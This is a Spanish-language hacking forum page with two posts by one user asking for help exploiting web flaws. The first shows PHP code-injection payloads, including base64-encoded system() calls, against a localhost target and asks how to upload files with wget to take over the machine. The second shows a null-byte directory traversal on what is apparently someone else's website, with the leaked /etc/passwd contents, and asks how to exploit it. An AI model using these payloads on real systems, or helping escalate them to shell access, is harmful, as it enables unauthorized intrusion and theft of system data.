elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Hacking / PHP injection en: 10 Junio 2011, 01:41 am
Buenas.

Bueno pues estoy intentado utilizar un ataque php injection. Esta es mi situación:


1.-http://localhost/?lang=${@phpinfo()}   FUNCIONA / http://localhost/?lang=http//localhost/phpinfo.txt NO FUNCIONA (obviamente tiene el código php para mostrar el phpinfo).

2.-Me puse a toquetear y a investigar http://localhost/?lang=${@system(ls -l)} NO FUNCIONA, al no funcionar me sale el típico error 500 y me añade %20 en la url (espacio).
Así que pensé en utilizar base64.

3.-http://localhost/?lang=${@system(base64_decode(bHMgLWw))} FUNCIONA

Ahora es aquí donde me atasco. Qué debería hacer para acceder a la máquina. He estado leyendo y hay que subir archivos con wget etc, pero es que no encuentro la fórmula de cómo poner la url ni que archivo subir.

Thanks.  ;D
2  Seguridad Informática / Nivel Web / Directory traversal en: 18 Octubre 2010, 20:57 pm
Wenas, acabo de encontrar una vuln. en una web y es la siguiente:

../../../../../../../../../../etc/passwd%00.png

al ejecutarla en el navegador sale:
Código:
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/bash daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd ...... Y SIGUE

¿Cómo puedo explotar esta vuln? gracias.
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines